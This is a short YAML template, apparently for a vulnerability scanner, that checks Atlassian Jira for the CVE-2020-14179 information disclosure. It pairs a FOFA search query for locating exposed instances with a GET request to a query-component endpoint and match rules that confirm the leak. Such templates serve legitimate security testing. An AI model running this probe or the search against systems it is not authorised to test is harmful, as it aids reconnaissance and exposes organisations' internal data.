product: Atlassian-Jira
vName: Atlassian-Jira 信息泄露
type: 信息泄露
vID:
  - CVE-2020-14179
level: 3
vDesc: ''
version: ''
note: ''
search:
  FOFA: app="ATLASSIAN-JIRA"
protocol: http
link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14179
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /secure/querycomponent!default.jspa
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - com.atlassian.jira
            logic: and
          header:
            value:
              - Content-Type
              - json
            logic: and